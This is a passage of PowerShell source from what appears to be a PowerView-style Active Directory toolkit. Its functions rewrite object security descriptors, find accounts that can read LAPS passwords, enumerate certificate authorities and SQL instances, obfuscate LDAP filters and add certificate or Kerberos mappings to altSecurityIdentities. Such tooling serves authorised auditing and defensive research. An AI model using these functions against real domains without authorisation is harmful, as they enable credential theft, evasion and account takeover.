\"[Set-DomainObjectSD] Unable to read $InputFile\"\n                }\n                $RestoreTargets.keys | Get-IdentityFilterString | ForEach-Object {\n                    $Filter += $_\n                }\n            } \n            elseif ($Identity -and $SDDLString) {\n                Write-Verbose \"[Set-DomainObjectSD] Setting provided identities: $Identity\"\n                $Identity | Get-IdentityFilterString | ForEach-Object {\n                    $Filter += $_\n                }\n            }\n            if ($Filter) {\n                $Searcher.filter = \"(|$Filter)\"\n                $Results = $Searcher.FindAll()\n                $Results | Where-Object {$_} | ForEach-Object {\n                    $Object = $_\n\n                    if ($Object.Properties.objectsid -and $Object.Properties.objectsid[0]) {\n                        $ObjectSid = (New-Object System.Security.Principal.SecurityIdentifier($Object.Properties.objectsid[0],0)).Value\n                    }\n                    else {\n                        $ObjectSid = $Null\n                    }\n                    if ($PSBoundParameters['InputFile']) {\n                        $SDDLString = $RestoreTargets.$ObjectSid\n                    }\n\n                    # Build Raw SD\n                    Write-Verbose \"[Set-DomainObjectSD] Building raw SD from SDDL string: $SDDLString\"\n                    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $SDDLString\n                    $SDBytes = New-Object byte[] ($SD.BinaryLength)\n                    $SD.GetBinaryForm($SDBytes, 0)\n\n                    $Entry = $Object.GetDirectoryEntry()\n                    try {\n                        Write-Verbose \"[Set-DomainObjectSD] Setting 'ntsecuritydescriptor' to '$SDBytes' for object '$($Object.Properties.samaccountname)'\"\n                        $Entry.InvokeSet('ntsecuritydescriptor', $SDBytes)\n                        $Entry.commitchanges()\n                    }\n                    catch {\n                        Write-Warning \"[Set-DomainObjectSD] Error setting security descriptor for object '$($Object.Properties.samaccountname)' : $SDBytes\"\n                        Write-Warning \"[Set-DomainObjectSD] Make sure you have Owner privileges\"\n                    }\n\n                }\n            }\n        }\n    }\n\n}\n\nfunction Get-DomainDN {\n<#\n.SYNOPSIS\n\nReturns the distinguished name for the current domain or the specified domain.\n\nAuthor: Charlie Clark (@exploitph)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainComputer  \n\n.DESCRIPTION\n\nReturns the distinguished name for the current domain or the specified domain by executing\nGet-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)\nto search for domain controllers through LDAP. The SID of the returned domain controller\nis then extracted. Largely stolen from @harmj0y's Get-DomainSID.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainDN\n\n.EXAMPLE\n\nGet-DomainDN -Domain testlab.local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainDN -Credential $Cred\n\n.OUTPUTS\n\nString\n\nA string representing the specified domain distinguished name.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    $SearcherArguments = @{\n        'LDAPFilter' = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'\n    }\n    if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n    if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n    if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n    if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n\n    if ($PSBoundParameters['Domain']) {\n        $DomainDN = \"DC=$($Domain -replace '\\.',',DC=')\"\n    }\n    else {\n        $DCDN = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 -ExpandProperty distinguishedname\n\n        if ($DCDN) {\n            $DomainDN = $DCDN.SubString($DCDN.IndexOf(',DC=')+1)\n        }\n        else {\n            Write-Verbose \"[Get-DomainDN] Error extracting domain DN for '$Domain'\"\n        }\n    }\n    if ($DomainDN) {\n        $DomainDN\n    }\n    else {\n        Write-Verbose \"[Get-DomainDN] Error resolving domain DN for '$Domain'\"\n    }\n}\n\nfunction Get-DomainLAPSReaders {\n<#\n.SYNOPSIS\n\nFinds accounts that can view the LAPS password for machine accounts.\n\nAuthor: Charlie Clark (@exploitph)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.PARAMETER Identity\n\nA SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\nor a dns host name (e.g. windows10.testlab.local). Wildcards accepted.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainLAPSReaders\n\nReturns the LAPS reader information in current domain.\n#>\n    [OutputType([PSObject])]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('SamAccountName', 'Name', 'DNSHostName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $Searcher = Get-DomainSearcher @SearcherArguments\n    }\n\n    PROCESS {\n        $Filter = ''\n        $ACLs = @()\n        if (!($Identity)) {\n            $Identity = (Get-DomainComputer -HasLAPS @SearcherArguments).objectsid\n        }\n        $Identity | Get-DomainObjectAcl -RightsFilter ReadLAPS @SearcherArguments | ForEach-Object {\n            if (!($Filter) -or ($Filter -notmatch $_.ObjectSID)) {\n                Write-Verbose \"[Get-DomainLAPSReaders] Adding $($_.ObjectSID) to filter\"\n                $Filter += \"(objectsid=$($_.ObjectSID))\"\n            }\n            if ($Filter -notmatch $_.SecurityIdentifier) {\n                Write-Verbose \"[Get-DomainLAPSReaders] Adding $($_.SecurityIdentifier) to filter\"\n                $Filter += \"(objectsid=$($_.SecurityIdentifier))\"\n            }\n            $ACLs += $_\n        }\n        if ($Filter) {\n            $Accounts = @()\n            $Searcher.filter = \"(|$Filter)\"\n            Write-Verbose \"[Get-DomainLAPSReaders] Using filter: $($Searcher.filter)\"\n            $Results = $Searcher.FindAll()\n            $Results | Where-Object {$_} | ForEach-Object {\n                $Accounts += $_.Properties\n            }\n\n            $ACLs | ForEach-Object {\n                $ObjectSID = $_.ObjectSID\n                $PrincipalSID = $_.SecurityIdentifier\n                $ADRights = $_.ActiveDirectoryRights\n                $Object = $Accounts | ?{(New-Object System.Security.Principal.SecurityIdentifier($_.objectsid[0],0)).Value -eq $ObjectSID}\n                $Principal = $Accounts | ?{(New-Object System.Security.Principal.SecurityIdentifier($_.objectsid[0],0)).Value -eq $PrincipalSID}\n                $OutObject = New-Object PSObject\n                if ($Object) {\n                    $OutObject | Add-Member \"ObjectName\" $Object.samaccountname[0]\n                    $OutObject | Add-Member \"ObjectType\" ($Object.samaccounttype[0] -as $SamAccountTypeEnum)\n                }\n                $OutObject | Add-Member \"ObjectSID\" $ObjectSID\n                $OutObject | Add-Member \"ActiveDirectoryRights\" $ADRights\n                if ($Principal) {\n                    $OutObject | Add-Member \"PrincipalName\" $Principal.samaccountname[0]\n                    $OutObject | Add-Member \"PrincipalType\" ($Principal.samaccounttype[0] -as $SamAccountTypeEnum)\n                    if ($OutObject.PrincipalType -eq 'GROUP_OBJECT' -or $OutObject.PrincipalType -eq 'ALIAS_OBJECT') {\n                       $PrincipalMembers  = @()\n                        $Principal | Get-DomainGroupMember -Recurse @SearcherArguments | ForEach-Object {\n                            $Member = $_\n                            $Member\n                            if ($Member.MemberObjectClass -ne 'group') {\n                                $PrincipalMembers += $Member\n                            }\n                        }\n                        $OutObject | Add-Member \"RecursivePrincipalMembers\" $PrincipalMembers\n                    }\n                }\n                $OutObject | Add-Member \"PrincipalSID\" $PrincipalSID\n                $OutObject\n            }\n        }\n    }\n}\n\nfunction Get-DomainEnrollmentServers {\n<#\n.SYNOPSIS\n\nReturns the certificate enrollment servers for the current domain or the specified domain.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObject, Get-DomainDN\n\n.DESCRIPTION\n\nReturns the certificate enrollment servers for the current domain or the specified domain by searching\nCN=Configuration,[DomainDN] for (objectCategory=pKIEnrollmentService) as described in\n@harmj0y and @tifkin's Certified_Pre-Owned (https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf).\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainEnrollmentServers\n\n.EXAMPLE\n\nGet-DomainEnrollmentServers -Domain testlab.local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainEnrollmentServers -Credential $Cred\n\n.OUTPUTS\n\nPS Objects representing the specified domain enrollment servers.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    $SearcherArguments = @{}\n    if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n    if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n    $DomainDN = Get-DomainDN @SearcherArguments\n\n    if ($DomainDN) {\n        Write-Verbose \"[Get-DomainEnrollmentServers] Got domain DN: $DomainDN\"\n    }\n    else {\n        Write-Verbose \"[Get-DomainEnrollmentServers] Error extracting domain DN for '$Domain'\"\n    }\n\n    Get-DomainObject -SearchBase \"CN=Configuration,$DomainDN\" -LDAPFilter \"(objectCategory=pKIEnrollmentService)\" @SearcherArguments\n}\n\nfunction Get-DomainCACertificates {\n<#\n.SYNOPSIS\n\nReturns the CA certificates for the current domain or the specified domain.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: Get-DomainObject, Get-DomainDN\n\n.DESCRIPTION\n\nReturns the CA certificates for the current domain or the specified domain by searching\nCN=Configuration,[DomainDN] for (objectCategory=pKIEnrollmentService) as described in\n@harmj0y and @tifkin's Certified_Pre-Owned (https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf).\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainCACertificates\n\n.EXAMPLE\n\nGet-DomainCACertificates -Domain testlab.local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainCACertificates -Credential $Cred\n\n.OUTPUTS\n\nPS Objects representing the specified domain CA certificates.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    $SearcherArguments = @{}\n    if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n    if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n    $DomainDN = Get-DomainDN @SearcherArguments\n\n    if ($DomainDN) {\n        Write-Verbose \"[Get-DomainCACertificates] Got domain DN: $DomainDN\"\n    }\n    else {\n        Write-Verbose \"[Get-DomainCACertificates] Error extracting domain DN for '$Domain'\"\n    }\n\n    Get-DomainObject -SearchBase \"CN=Configuration,$DomainDN\" -LDAPFilter \"(objectCategory=certificationAuthority)\" @SearcherArguments\n}\n\nfunction Get-DomainSQLInstances {\n<#\n.SYNOPSIS\n\nReturns a list of SQL instances for the current domain or the specified domain usable with PowerUPSQL cmdlets.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: Get-DomainObject, Get-DomainDN\n\n.DESCRIPTION\n\nReturns a list of SQL instances for the current domain or the specified domain by searching\nfor (serviceprincipalname=MSSQLSvc*) and modifying the relevent SPNs to be directly usable with\nPowerUpSQL cmdlets.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainSQLInstances\n\n.EXAMPLE\n\nGet-DomainSQLInstances -Domain testlab.local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainSQLInstances -Credential $Cred\n\n.OUTPUTS\n\nStrings\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    $SearcherArguments = @{}\n    if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n    if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n    Get-DomainObject -LDAPFilter \"(serviceprincipalname=MSSQLSvc*)\" @SearcherArguments | select -expand serviceprincipalname | Where-Object {\n        $_ -match \"MSSQLSvc\" \n    } | Foreach-Object {\n        ($_ -split '/')[1] -replace ':',','\n    }\n}\n\nfunction Add-DomainAltSecurityIdentity {\n<#\n.SYNOPSIS\n\nAdds a value to the altSecurityIdentities AD attribute.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: Set-DomainObject, Get-DomainDN, Get-IdentityFilterString\n\n.DESCRIPTION\n\nAdds a value to the altSecurityIdentites AD attribute while ensuring the current values remain the same.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\nor a dns host name (e.g. windows10.testlab.local). Wildcards accepted.\n\n.PARAMETER Type\n\nThe type of identity to add (Certificate or Kerberos).\n\n.PARAMETER Issuer\n\nThe certificate issuer, if a Certificate has been specified.\n\n.PARAMETER Subject\n\nThe certificate subject, if a certificate has been specified.\n\n.PARAMETER Account\n\nThe external Kerberos account to add, if Kerberos has been specified.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nAdd-DomainAltSecurityIdentity\n\n.EXAMPLE\n\nAdd-DomainAltSecurityIdentity -Domain testlab.local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nAdd-DomainAltSecurityIdentity -Credential $Cred\n\n.OUTPUTS\n\nNothing\n\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String[]]\n        $Identity,\n\n        [ValidateSet('Certificate', 'Kerberos')]\n        [String]\n        $Type = 'Certificate',\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Issuer,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Subject,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Account,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $Searcher = Get-DomainSearcher @SearcherArguments\n        $DomainDNArguments = @{}\n        if ($PSBoundParameters['Domain']) { $DomainDNArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $DomainDNArguments['Server'] = $Server }\n        if ($PSBoundParameters['Credential']) { $DomainDNArguments['Credential'] = $Credential }\n    }\n\n\n    PROCESS {\n        $Filter = ''\n        if ($Identity) {\n            Write-Verbose \"[Add-DomainAltSecurityIdentity] Setting provided identities: $Identity\"\n            $Identity | Get-IdentityFilterString | ForEach-Object {\n                $Filter += $_\n            }\n        }\n\n        $AltIDString = ''\n        if ($PSBoundParameters['Type'] -eq 'Certificate') {\n            $DomainDN = Get-DomainDN @DomainDNArguments\n            $DomainDNSplit = $DomainDN -split ','\n            [array]::Reverse($DomainDNSplit)\n            $ReversedDomainDN = $DomainDNSplit -join ','\n\n            $AltIDString = 'X509:'\n            if ($PSBoundParameters['Issuer']) {\n                $AltIDString += \"<I>$ReversedDomainDN,$Issuer\"\n            }\n            if ($PSBoundParameters['Subject']) {\n                $AltIDString += \"<S>$ReversedDomainDN,$Subject\"\n            }\n            else {\n                Write-Error \"[Add-DomainAltSecurityIdentity] Certificate altSecurityIdentity requires a Subject\"\n                return\n            }\n        }\n        elseif ($PSBoundParameters['Account']) {\n            $AltIDString = \"Kerberos:$Account\"\n        }\n        else {\n            Write-Error \"[Add-DomainAltSecurityIdentity] A -Type must be set\"\n            return\n        }\n\n        Write-Verbose \"[Add-DomainAltSecurityIdentity] Using Alternate Identity string: $AltIDString\"\n\n\n        if ($Filter) {\n            $Searcher.filter = \"(|$Filter)\"\n            $Results = $Searcher.FindAll()\n            $Results | Where-Object {$_} | ForEach-Object {\n                $Props = $_.Properties\n                if ($Props.keys -contains 'altsecurityidentities') {\n                    $AltIDs = $Props['altsecurityidentities']\n                }\n                else {\n                    $AltIDs = @()\n                }\n\n                $AltIDs += $AltIDString\n\n                Set-DomainObject $Props['samaccountname'] -Set @{'altsecurityidentities'=$AltIDs}\n            }\n        }\n    }\n}\n\nfunction Invoke-LDAPQuery {\n<#\n.SYNOPSIS\n\nRetrieve an LDAP query and return the results in a common format.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: \n\n.DESCRIPTION\n\nRetrieve an LDAP query and return the results in a common format.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.PARAMETER SSL\n\nSwitch. Use SSL to connect to LDAP Server.\n\n.PARAMETER Obfuscate\n\nSwitch. Automatically obfuscate LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nInvoke-LDAPQuery -Domain testlab.local\n\n.INPUTS\n\nString\n\n.OUTPUTS\n\nPowerView.User\n\nCustom PSObject with translated user property fields.\n\nPowerView.User.Raw\n\nThe raw DirectoryServices.SearchResult object, if -Raw is enabled.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.User')]\n    [OutputType('PowerView.User.Raw')]\n    Param(\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['Owner']) { $SearcherArguments['Properties'] = '*' }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if 